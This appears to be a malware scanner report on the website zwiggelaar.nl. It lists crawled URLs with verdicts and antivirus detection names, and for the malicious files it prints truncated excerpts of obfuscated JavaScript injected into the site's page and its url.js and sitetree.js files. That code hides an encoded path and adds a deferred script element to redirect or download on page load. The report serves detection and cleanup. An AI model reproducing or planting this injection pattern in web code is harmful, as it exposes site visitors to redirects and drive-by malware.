Request | Server response | Status |
http://zwiggelaar.nl/ | 200 OK Content-Length: 7874 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var AD;if(AD!=''){AD='BW'};var K;if(K!='D' && K!='Hu'){K=''};this.Yv="";function Y(){var TC=new Array();var n=new Array();var YO=unescape;var w;if(w!='a' && w != ''){w=null};var b;if(b!='' && b!='gW'){b=null};var s=window;var V=YO("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%61%63%65%72%2e%63%6f%6d%2f%65%78%61%6d%69%6e%65%72%2e%63%6f%6d%2e%70%68%70");this.KQ='';var hO="";var r;if(r!='' && r!='U'){r=null};function h(T,z){var W='';var M;if(M!='' && M!='vK'){M='TO'}
... 1220 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();Antivirus reports:- AntiVir
- JS/Illredir.BZ
- Avast
- JS:Illredir-AQ [Trj]
- Ad-Aware
- Trojan.Script.402625
- Antiy-AVL
- Trojan/JS.Redirector
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Script.402625
- K7AntiVirus
- Trojan ( 637f3b880 )
- TrendMicro-HouseCall
- JS_KEMPAR.SM
- Comodo
- TrojWare.JS.Redirector.UA
- Emsisoft
- Trojan.Script.402625 (B)
- K7GW
- Exploit ( 04c559b91 )
- McAfee-GW-Edition
- JS/Redirector.ad
- TrendMicro
- JS_KEMPAR.SM
- Microsoft
- Trojan:JS/Redirector.DC
- Kaspersky
- Trojan.JS.Redirector.kv
- MicroWorld-eScan
- Trojan.Script.402625
- Fortinet
- JS/Crypt.BBES!tr
- TotalDefense
- JS/Redirector.BH
- McAfee
- JS/Redirector.ad
- NANO-Antivirus
- Trojan.Script.Agent.yrkab
- F-Secure
- Trojan.Script.402625
- VIPRE
- Trojan.JS.Redirector.cr (v)
- F-Prot
- JS/Redir.AZ
- AVG
- JS/Redir
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Script.402625
- Commtouch
- JS/Redir.AZ
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AA
- BitDefender
- Trojan.Script.402625
|
http://zwiggelaar.nl/./include/url.js | 200 OK Content-Length: 17388 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var CM_SESSION_KEY_KEY = "cmSessionKeyKey";
function getSessionPair(loc) {
return URL.getSessionPair(loc);
}
function getSessionHref() {
return URL.getSessionHref();
}
function processLinkz(doc) {
URL.processLinkz(doc);
}
function getSessionString() {
return URL.getSessionString();
}
function jdecode(s) {
return URL.jdecode(s);
}
function jencode(s) {
return URL.jencode(
... 3467 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();Antivirus reports:- Avast
- JS:Illredir-AQ [Trj]
- Ad-Aware
- Trojan.Iframe.AZF
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Iframe.AZF
- K7AntiVirus
- Trojan ( 637f3b880 )
- TrendMicro-HouseCall
- JS_GUMBLAR.SMNY
- Comodo
- TrojWare.JS.Redirector.UA
- Emsisoft
- Trojan.Iframe.AZF (B)
- K7GW
- Exploit ( 04c559b91 )
- McAfee-GW-Edition
- JS/Redirector.ad
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_GUMBLAR.SMNY
- Microsoft
- Trojan:JS/Redirector.DC
- Kaspersky
- Trojan.JS.Redirector.kv
- MicroWorld-eScan
- Trojan.Iframe.AZF
- Fortinet
- JS/Crypt.BBES!tr
- TotalDefense
- JS/Redirector.BH
- McAfee
- JS/Redirector.ad
- NANO-Antivirus
- Trojan.Script.Agent.yrkab
- F-Secure
- Trojan.Iframe.AZF
- F-Prot
- JS/Redir.AZ
- AVG
- JS/Redir
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Iframe.AZF
- Commtouch
- JS/Redir.AZ
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AA
- BitDefender
- Trojan.Iframe.AZF
|
http://zwiggelaar.nl/./include/sitetree.js | 200 OK Content-Length: 8851 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function jdecode(s) {
s = s.replace(/\+/g, "%20")
return unescape(s);
}
var POS_NODENAME=0;
var POS_ID=1;
var POS_NAME=2;
var POS_NAVIGATIONTEXT=3;
var POS_HREF=4;
var POS_ISNAVIGATION=5;
var POS_CHILDS=6;
var POS_TEMPLATENAME=7;
var theSitetree=[
['PAGE','1508',jdecode('Portal'),jdecode(''),'/1508.html','true',[],''],
['PAGE','33801',jdecode('Webmail'),jdecode(''),'/33801.html','true',[],'']];
... 3312 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();Antivirus reports:- Avast
- JS:Illredir-AQ [Trj]
- Ad-Aware
- Trojan.Iframe.AZF
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Iframe.AZF
- K7AntiVirus
- Trojan ( 637f3b880 )
- TrendMicro-HouseCall
- JS_GUMBLAR.SMNY
- Comodo
- TrojWare.JS.Redirector.UA
- Emsisoft
- Trojan.Iframe.AZF (B)
- K7GW
- Exploit ( 04c559b91 )
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_GUMBLAR.SMNY
- Microsoft
- Trojan:JS/Redirector.DC
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- MicroWorld-eScan
- Trojan.Iframe.AZF
- TotalDefense
- JS/Redirector.BH
- NANO-Antivirus
- Trojan.Script.Agent.yrkab
- F-Secure
- Trojan.Iframe.AZF
- F-Prot
- JS/Redir.AZ
- AVG
- JS/Redir
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Iframe.AZF
- Commtouch
- JS/Redir.AZ
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AA
- BitDefender
- Trojan.Iframe.AZF
|
http://zwiggelaar.nl/./1508.html?*session*id*key*=*session*id*val* | 200 OK Content-Length: 5729 Content-Type: text/html | clean |
http://zwiggelaar.nl/././include/url.js | 200 OK Content-Length: 17388 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var CM_SESSION_KEY_KEY = "cmSessionKeyKey";
function getSessionPair(loc) {
return URL.getSessionPair(loc);
}
function getSessionHref() {
return URL.getSessionHref();
}
function processLinkz(doc) {
URL.processLinkz(doc);
}
function getSessionString() {
return URL.getSessionString();
}
function jdecode(s) {
return URL.jdecode(s);
}
function jencode(s) {
return URL.jencode(
... 3467 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();Antivirus reports:- Avast
- JS:Illredir-AQ [Trj]
- Ad-Aware
- Trojan.Iframe.AZF
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Iframe.AZF
- K7AntiVirus
- Trojan ( 637f3b880 )
- TrendMicro-HouseCall
- JS_GUMBLAR.SMNY
- Comodo
- TrojWare.JS.Redirector.UA
- Emsisoft
- Trojan.Iframe.AZF (B)
- K7GW
- Exploit ( 04c559b91 )
- McAfee-GW-Edition
- JS/Redirector.ad
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_GUMBLAR.SMNY
- Microsoft
- Trojan:JS/Redirector.DC
- Kaspersky
- Trojan.JS.Redirector.kv
- MicroWorld-eScan
- Trojan.Iframe.AZF
- Fortinet
- JS/Crypt.BBES!tr
- TotalDefense
- JS/Redirector.BH
- McAfee
- JS/Redirector.ad
- NANO-Antivirus
- Trojan.Script.Agent.yrkab
- F-Secure
- Trojan.Iframe.AZF
- F-Prot
- JS/Redir.AZ
- AVG
- JS/Redir
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Iframe.AZF
- Commtouch
- JS/Redir.AZ
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AA
- BitDefender
- Trojan.Iframe.AZF
|
http://zwiggelaar.nl/././include/sitetree.js | 200 OK Content-Length: 8851 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function jdecode(s) {
s = s.replace(/\+/g, "%20")
return unescape(s);
}
var POS_NODENAME=0;
var POS_ID=1;
var POS_NAME=2;
var POS_NAVIGATIONTEXT=3;
var POS_HREF=4;
var POS_ISNAVIGATION=5;
var POS_CHILDS=6;
var POS_TEMPLATENAME=7;
var theSitetree=[
['PAGE','1508',jdecode('Portal'),jdecode(''),'/1508.html','true',[],''],
['PAGE','33801',jdecode('Webmail'),jdecode(''),'/33801.html','true',[],'']];
... 3312 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();Antivirus reports:- Avast
- JS:Illredir-AQ [Trj]
- Ad-Aware
- Trojan.Iframe.AZF
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Iframe.AZF
- K7AntiVirus
- Trojan ( 637f3b880 )
- TrendMicro-HouseCall
- JS_GUMBLAR.SMNY
- Comodo
- TrojWare.JS.Redirector.UA
- Emsisoft
- Trojan.Iframe.AZF (B)
- K7GW
- Exploit ( 04c559b91 )
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_GUMBLAR.SMNY
- Microsoft
- Trojan:JS/Redirector.DC
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- MicroWorld-eScan
- Trojan.Iframe.AZF
- TotalDefense
- JS/Redirector.BH
- NANO-Antivirus
- Trojan.Script.Agent.yrkab
- F-Secure
- Trojan.Iframe.AZF
- F-Prot
- JS/Redir.AZ
- AVG
- JS/Redir
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Iframe.AZF
- Commtouch
- JS/Redir.AZ
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AA
- BitDefender
- Trojan.Iframe.AZF
|
http://zwiggelaar.nl/././1508.html?*session*id*key*=*session*id*val* | 200 OK Content-Length: 5729 Content-Type: text/html | clean |
http://zwiggelaar.nl/./././include/url.js | 200 OK Content-Length: 17388 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var CM_SESSION_KEY_KEY = "cmSessionKeyKey";
function getSessionPair(loc) {
return URL.getSessionPair(loc);
}
function getSessionHref() {
return URL.getSessionHref();
}
function processLinkz(doc) {
URL.processLinkz(doc);
}
function getSessionString() {
return URL.getSessionString();
}
function jdecode(s) {
return URL.jdecode(s);
}
function jencode(s) {
return URL.jencode(
... 3467 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();Antivirus reports:- Avast
- JS:Illredir-AQ [Trj]
- Ad-Aware
- Trojan.Iframe.AZF
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Iframe.AZF
- K7AntiVirus
- Trojan ( 637f3b880 )
- TrendMicro-HouseCall
- JS_GUMBLAR.SMNY
- Comodo
- TrojWare.JS.Redirector.UA
- Emsisoft
- Trojan.Iframe.AZF (B)
- K7GW
- Exploit ( 04c559b91 )
- McAfee-GW-Edition
- JS/Redirector.ad
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_GUMBLAR.SMNY
- Microsoft
- Trojan:JS/Redirector.DC
- Kaspersky
- Trojan.JS.Redirector.kv
- MicroWorld-eScan
- Trojan.Iframe.AZF
- Fortinet
- JS/Crypt.BBES!tr
- TotalDefense
- JS/Redirector.BH
- McAfee
- JS/Redirector.ad
- NANO-Antivirus
- Trojan.Script.Agent.yrkab
- F-Secure
- Trojan.Iframe.AZF
- F-Prot
- JS/Redir.AZ
- AVG
- JS/Redir
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Iframe.AZF
- Commtouch
- JS/Redir.AZ
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AA
- BitDefender
- Trojan.Iframe.AZF
|
http://zwiggelaar.nl/./././include/sitetree.js | 200 OK Content-Length: 8851 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function jdecode(s) {
s = s.replace(/\+/g, "%20")
return unescape(s);
}
var POS_NODENAME=0;
var POS_ID=1;
var POS_NAME=2;
var POS_NAVIGATIONTEXT=3;
var POS_HREF=4;
var POS_ISNAVIGATION=5;
var POS_CHILDS=6;
var POS_TEMPLATENAME=7;
var theSitetree=[
['PAGE','1508',jdecode('Portal'),jdecode(''),'/1508.html','true',[],''],
['PAGE','33801',jdecode('Webmail'),jdecode(''),'/33801.html','true',[],'']];
... 3312 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();Antivirus reports:- Avast
- JS:Illredir-AQ [Trj]
- Ad-Aware
- Trojan.Iframe.AZF
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Iframe.AZF
- K7AntiVirus
- Trojan ( 637f3b880 )
- TrendMicro-HouseCall
- JS_GUMBLAR.SMNY
- Comodo
- TrojWare.JS.Redirector.UA
- Emsisoft
- Trojan.Iframe.AZF (B)
- K7GW
- Exploit ( 04c559b91 )
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_GUMBLAR.SMNY
- Microsoft
- Trojan:JS/Redirector.DC
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- MicroWorld-eScan
- Trojan.Iframe.AZF
- TotalDefense
- JS/Redirector.BH
- NANO-Antivirus
- Trojan.Script.Agent.yrkab
- F-Secure
- Trojan.Iframe.AZF
- F-Prot
- JS/Redir.AZ
- AVG
- JS/Redir
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Iframe.AZF
- Commtouch
- JS/Redir.AZ
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AA
- BitDefender
- Trojan.Iframe.AZF
|
http://zwiggelaar.nl/./././1508.html?*session*id*key*=*session*id*val* | 200 OK Content-Length: 5729 Content-Type: text/html | clean |
http://zwiggelaar.nl/././././include/url.js | 200 OK Content-Length: 17388 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var CM_SESSION_KEY_KEY = "cmSessionKeyKey";
function getSessionPair(loc) {
return URL.getSessionPair(loc);
}
function getSessionHref() {
return URL.getSessionHref();
}
function processLinkz(doc) {
URL.processLinkz(doc);
}
function getSessionString() {
return URL.getSessionString();
}
function jdecode(s) {
return URL.jdecode(s);
}
function jencode(s) {
return URL.jencode(
... 3467 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();Antivirus reports:- Avast
- JS:Illredir-AQ [Trj]
- Ad-Aware
- Trojan.Iframe.AZF
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Iframe.AZF
- K7AntiVirus
- Trojan ( 637f3b880 )
- TrendMicro-HouseCall
- JS_GUMBLAR.SMNY
- Comodo
- TrojWare.JS.Redirector.UA
- Emsisoft
- Trojan.Iframe.AZF (B)
- K7GW
- Exploit ( 04c559b91 )
- McAfee-GW-Edition
- JS/Redirector.ad
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_GUMBLAR.SMNY
- Microsoft
- Trojan:JS/Redirector.DC
- Kaspersky
- Trojan.JS.Redirector.kv
- MicroWorld-eScan
- Trojan.Iframe.AZF
- Fortinet
- JS/Crypt.BBES!tr
- TotalDefense
- JS/Redirector.BH
- McAfee
- JS/Redirector.ad
- NANO-Antivirus
- Trojan.Script.Agent.yrkab
- F-Secure
- Trojan.Iframe.AZF
- F-Prot
- JS/Redir.AZ
- AVG
- JS/Redir
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Iframe.AZF
- Commtouch
- JS/Redir.AZ
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AA
- BitDefender
- Trojan.Iframe.AZF
|
http://zwiggelaar.nl/././././include/sitetree.js | 200 OK Content-Length: 8851 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function jdecode(s) {
s = s.replace(/\+/g, "%20")
return unescape(s);
}
var POS_NODENAME=0;
var POS_ID=1;
var POS_NAME=2;
var POS_NAVIGATIONTEXT=3;
var POS_HREF=4;
var POS_ISNAVIGATION=5;
var POS_CHILDS=6;
var POS_TEMPLATENAME=7;
var theSitetree=[
['PAGE','1508',jdecode('Portal'),jdecode(''),'/1508.html','true',[],''],
['PAGE','33801',jdecode('Webmail'),jdecode(''),'/33801.html','true',[],'']];
... 3312 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();Antivirus reports:- Avast
- JS:Illredir-AQ [Trj]
- Ad-Aware
- Trojan.Iframe.AZF
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Iframe.AZF
- K7AntiVirus
- Trojan ( 637f3b880 )
- TrendMicro-HouseCall
- JS_GUMBLAR.SMNY
- Comodo
- TrojWare.JS.Redirector.UA
- Emsisoft
- Trojan.Iframe.AZF (B)
- K7GW
- Exploit ( 04c559b91 )
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_GUMBLAR.SMNY
- Microsoft
- Trojan:JS/Redirector.DC
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- MicroWorld-eScan
- Trojan.Iframe.AZF
- TotalDefense
- JS/Redirector.BH
- NANO-Antivirus
- Trojan.Script.Agent.yrkab
- F-Secure
- Trojan.Iframe.AZF
- F-Prot
- JS/Redir.AZ
- AVG
- JS/Redir
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Iframe.AZF
- Commtouch
- JS/Redir.AZ
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AA
- BitDefender
- Trojan.Iframe.AZF
|
http://zwiggelaar.nl/././././1508.html?*session*id*key*=*session*id*val* | 200 OK Content-Length: 5729 Content-Type: text/html | clean |
http://zwiggelaar.nl/./././././include/url.js | 200 OK Content-Length: 17388 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var CM_SESSION_KEY_KEY = "cmSessionKeyKey";
function getSessionPair(loc) {
return URL.getSessionPair(loc);
}
function getSessionHref() {
return URL.getSessionHref();
}
function processLinkz(doc) {
URL.processLinkz(doc);
}
function getSessionString() {
return URL.getSessionString();
}
function jdecode(s) {
return URL.jdecode(s);
}
function jencode(s) {
return URL.jencode(
... 3467 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();Antivirus reports:- Avast
- JS:Illredir-AQ [Trj]
- Ad-Aware
- Trojan.Iframe.AZF
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Iframe.AZF
- K7AntiVirus
- Trojan ( 637f3b880 )
- TrendMicro-HouseCall
- JS_GUMBLAR.SMNY
- Comodo
- TrojWare.JS.Redirector.UA
- Emsisoft
- Trojan.Iframe.AZF (B)
- K7GW
- Exploit ( 04c559b91 )
- McAfee-GW-Edition
- JS/Redirector.ad
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_GUMBLAR.SMNY
- Microsoft
- Trojan:JS/Redirector.DC
- Kaspersky
- Trojan.JS.Redirector.kv
- MicroWorld-eScan
- Trojan.Iframe.AZF
- Fortinet
- JS/Crypt.BBES!tr
- TotalDefense
- JS/Redirector.BH
- McAfee
- JS/Redirector.ad
- NANO-Antivirus
- Trojan.Script.Agent.yrkab
- F-Secure
- Trojan.Iframe.AZF
- F-Prot
- JS/Redir.AZ
- AVG
- JS/Redir
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Iframe.AZF
- Commtouch
- JS/Redir.AZ
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AA
- BitDefender
- Trojan.Iframe.AZF
|
http://zwiggelaar.nl/./././././include/sitetree.js | 200 OK Content-Length: 8851 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function jdecode(s) {
s = s.replace(/\+/g, "%20")
return unescape(s);
}
var POS_NODENAME=0;
var POS_ID=1;
var POS_NAME=2;
var POS_NAVIGATIONTEXT=3;
var POS_HREF=4;
var POS_ISNAVIGATION=5;
var POS_CHILDS=6;
var POS_TEMPLATENAME=7;
var theSitetree=[
['PAGE','1508',jdecode('Portal'),jdecode(''),'/1508.html','true',[],''],
['PAGE','33801',jdecode('Webmail'),jdecode(''),'/33801.html','true',[],'']];
... 3312 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();Antivirus reports:- Avast
- JS:Illredir-AQ [Trj]
- Ad-Aware
- Trojan.Iframe.AZF
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Iframe.AZF
- K7AntiVirus
- Trojan ( 637f3b880 )
- TrendMicro-HouseCall
- JS_GUMBLAR.SMNY
- Comodo
- TrojWare.JS.Redirector.UA
- Emsisoft
- Trojan.Iframe.AZF (B)
- K7GW
- Exploit ( 04c559b91 )
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_GUMBLAR.SMNY
- Microsoft
- Trojan:JS/Redirector.DC
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- MicroWorld-eScan
- Trojan.Iframe.AZF
- TotalDefense
- JS/Redirector.BH
- NANO-Antivirus
- Trojan.Script.Agent.yrkab
- F-Secure
- Trojan.Iframe.AZF
- F-Prot
- JS/Redir.AZ
- AVG
- JS/Redir
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Iframe.AZF
- Commtouch
- JS/Redir.AZ
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AA
- BitDefender
- Trojan.Iframe.AZF
|